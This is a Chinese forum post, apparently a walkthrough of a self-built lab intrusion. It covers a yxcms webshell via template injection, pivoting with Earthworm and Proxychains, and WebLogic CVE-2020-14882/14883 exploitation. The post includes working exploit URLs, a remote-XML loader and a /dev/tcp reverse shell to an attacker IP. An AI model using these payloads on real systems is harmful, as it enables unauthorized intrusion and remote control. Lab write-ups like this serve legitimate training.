本文章内系统都是自己搭建的虚拟环境
自行搭建了个简单内网渗透环境,准备了一台windows服务器和一台linux服务器,一台是可以访问的web服务器,还有其余的都搭建在内网,需要拿到web服务器的shell之后进行内网渗透
流程:kali攻击机利用Nday入侵web服务器 => 通过web服务器(跳板机)对同网段主机探测找到一台linux服务器 => linux服务器上搭建了
准备
kali为攻击机 桥接联网
windows搭建web服务
linux NAT联网
先扫一波常用端口
nmap -p 3306,3389,445,49155,139,49152,49156,48157,80,49153 -sC -A 192.168.1.107
80端口有apache服务
访问网站
是yxcms
弱口令登录后台
在前台模板的位置新建模板写入shell
模板写入路径ip/protected/apps/default/view/default/shell1.php?qwe=phpinfo();
连接蚁剑
通过蚁剑进行简单的信息收集
windows server 2019的版本 mimikatz抓密码有点困难
上远控木马,反正是自己的电脑也不用捆绑了
至此拿下web服务器
拿到web服务器之后扫描内网存活的服务器
也不知道为啥,传过去的fscan运行时蚁剑返回不了有用信息
我们换远控终端
{一个硬盘传输两个虚拟机太卡了 这里我把web服务器转移到了本机上 其实这样更方便}
小扫一波 康康有没有怨种复现完漏洞忘记关web服务了 嘿嘿
发现内网192.168.135.171存活,而且搭建着weblogic,
终于找到目标了
但是我们访问不到,需要将web服务器的流量代理出来
利用Earthworm+Proxychains
ew_for_Win.exe -s ssocksd -l 1080
配置Proxychains
vi /etc/proxychains.conf
搭建代理成功能够访问到了
cov-2020-14482
未授权访问后台
http://192.168.135.171:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
linux 反弹shellnc -lvp 8989
服务器反弹xml
/bin/bash
-cc
& /dev/tcp/192.168.1.114/8989 0>&1]]>
通过FileSystemXmlApplicationContext()加载并执行远端xml文件:
http://192.168.135.171:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://119.xxx.xxx.83/123.xml")
//////////////////////////end
最后监听到的页面卡死了 算了 再也不在移动硬盘里搭虚拟机了 卡死我了
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
清河逸尘 | 4.00 | 0 | 2022-05-20 23:11:05 | 一个受益终生的帖子~~ |
清河逸尘 | 4.00 | 0 | 2022-05-20 23:11:49 | 一个受益终生的帖子~~ |
Track-劲夫 | 50.00 | 0 | 2022-05-20 11:11:32 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
清河逸尘
发表于 2022-5-20
自己搭建的内网环境吗,还是靶机
评论列表
加载数据中...